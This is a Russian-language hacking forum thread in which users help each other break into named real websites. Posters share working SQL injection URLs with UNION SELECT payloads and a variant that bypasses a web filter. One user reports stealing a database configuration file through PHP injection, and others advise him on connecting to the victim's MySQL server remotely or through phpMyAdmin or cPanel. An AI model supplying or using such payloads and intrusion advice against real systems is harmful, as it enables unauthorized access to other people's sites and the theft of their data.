 |
|
20.06.2011, 14:48
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8411065
Репутация:
4
|
|
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
|
|
|
20.06.2011, 15:11
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами:
8749821
Репутация:
0
|
|
Сообщение от kroŧ
Как можно обойти такой фильтр?
http://www.onlymelbourne.com.au/melbourne.php?id=-371/*!UNioN*/SELeCT+1
просто переходит на:
http://www.onlymelbourne.com.au/melbourne.php
Заранее благодарю за любой ответ.
Я думаю никак.
Будет редирект всегда, там фильтры на слова ORDER, UNION,SELECT
|
|
|
|
20.06.2011, 16:07
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
С нами:
9761387
Репутация:
2
|
|
Подобрал колличество полей. Вылезло Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
|
|
|
|
20.06.2011, 16:23
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Сообщение от GroM88
Подобрал колличество полей. Вылезло
Forbidden
можно как то обойти?)
_http://philshopping.com/product_info.php?id=302+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13--
http://philshopping.com/product_info.php?id=302+and+1=0+union(select+1,2,3 ,4,5,6,7,8,9,10,11,12,13)+--+
|
|
|
|
20.06.2011, 17:24
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами:
8749821
Репутация:
0
|
|
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
|
|
|
|
20.06.2011, 17:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от stasiliy
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
может mysql_select_db() ?
|
|
|
|
20.06.2011, 17:51
|
|
Новичок
Регистрация: 26.09.2009
Сообщений: 22
С нами:
8749821
Репутация:
0
|
|
Сообщение от Konqi
может mysql_select_db() ?
Да, просто ошшибку сделал когда вам писал.
вот что пишет
Сообщение от None
Access denied for user 'user1_style_adm'@'%' to database 'user1_style'
|
|
|
|
20.06.2011, 17:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от stasiliy
Да, просто ошшибку сделал когда вам писал.
вот что пишет
http://google.ru/translate
нету доступа к этой базе
|
|
|
|
20.06.2011, 17:56
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
С нами:
9567396
Репутация:
23
|
|
Не получается вывести определенное поле из таблицы MySQL. Причем поле довольно странное.
Сообщение от None
SELECT count(field) FROM table
1234
Сообщение от None
SELECT count(field) FROM table WHERE LENGTH(field)>0
1234
Сообщение от None
SELECT LENGTH(field) FROM table LIMIT (1/10/1000),1
0
Пробовал AES_(EN/DE)CRYPT, HEX - на страницу ничего не выводится. |
|
|
|
20.06.2011, 18:06
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от stasiliy
Через Php-injection вытащил dbconfig.php
$dbhost="localhost";
Пробую подключиться, вместо localhost пишу ip домена.
К базе подключаеться , а вот mysql_connect_db не работает
В чем может быть проблемма?
спасибо
если пытаешься удоленно подключиться, то часто бывает что отключена функция удаленного в mysql, попробуй поискать phpmyadmin или cpanel, от туда и пытайся зайти...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
